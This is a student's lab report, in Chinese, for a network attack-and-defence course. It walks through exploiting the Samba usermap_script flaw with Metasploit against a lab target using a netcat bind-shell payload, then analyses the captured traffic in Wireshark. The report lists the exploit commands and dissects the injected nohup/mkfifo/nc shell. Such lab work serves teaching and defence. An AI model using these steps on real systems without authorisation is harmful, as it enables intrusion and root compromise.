20232805 2023-2024 《网络攻防实践》第7周作业

实践七 Linux操作系统安全攻防

1.实践内容

1.1 使用Metasploit进行Linux远程渗透攻击

任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

④设置渗透攻击参数（RHOST，LHOST，TARGET等）；

⑤执行渗透攻击；

⑥查看是否正确得到远程Shell，并查看获得的权限。

1.2 实践作业：攻防对抗实践

1.2.1 攻击方

使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

1.2.2 防守方

使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

使用kali作为攻击机，Ubuntu肉鸡作为靶机

测试连通性

msfconsole

search samba ，找到针对usermap_script安全漏洞的渗透攻击模块exploirt/multi/usermap_script

use exploit/multi/samba/usermap_script使用渗透攻击模块

show payloads，查看payload类型

set payload cmd/unix/bind_netcat设置攻击的PAYLOAD为cmd/unix/bind_netcat

show options，会列出模块所需要的各种参数

set LHOST 192.168.200.4 攻击机地址

set RHOST 192.168.200.130 靶机地址

run进行攻击

输入ifconfig，可以看到靶机的网络信息，攻击成功

whoami查询，已经是root权限了

2.2 实践作业：攻防对抗实践

原始

2.2.x 更新版攻防实践

2.2.x.1 防守方

新引入的虚拟机IP为192.168.254.13（默认IP），进攻者IP为192.168.254.138

验证连通性

进攻者留下的学号（20232812）

2.2.x.2 攻击方

把Kali虚拟机的IP改成192.168.200.166（和防守方在同一网段，防守方IP是200.188）

测试连通性

要打两次才能成功，第一次一定失败，不知道是什么原因

留下自己的学号（20232805）

2.2.x 分析

追踪最后一个TCP流可以看到进攻者的所有操作，之前使用漏洞和建立连接包好几次都没抓上，满屏幕都是DUP

2.2.1 攻击方

静态IP改成166，和防守方在同一个网段

检查连通性

按照实践1.1进行攻击

创建一个文件证明自己来过

2.2.2 防守方

被创建了某个不可描述的文件夹

2.2.3 分析

用靶机IP 200.130作为筛选条件

可以看到攻击者IP是200.166，端口号是40755，防守方IP是200.130，端口号是139，139端口是Unix中的Samba服务端口，可知攻击利用了Samba服务漏洞

追踪TCP流

其中

nohup运行命令可以使命令永久的执行下去

mkfifo是创建有文件名的管道, 用于任意两个进程间的通信

nc -l -p 4444 是网络工具netcat的命令，使用监听模式，通过4444号通信端口管控传入的信息

sh 是linux中运行shell的命令

继续追踪流

可以看到攻击者进行的所有操作

筛选SMB包

可以看到攻击者发送了一个SMB的请求包（Negotiate Protocol Response），靶机响应该请求包，之后攻击者发送一个会话设置请求包（Session setup X request），成功建立会话。

3.学习中遇到的问题及解决

注意第一个实践不是看双向联通（如果使用了蜜罐），检查攻击机能否ping通靶机即可

4.学习感想和体会

无

5.参考资料

- [ChatGPT 4](chat.openai.com)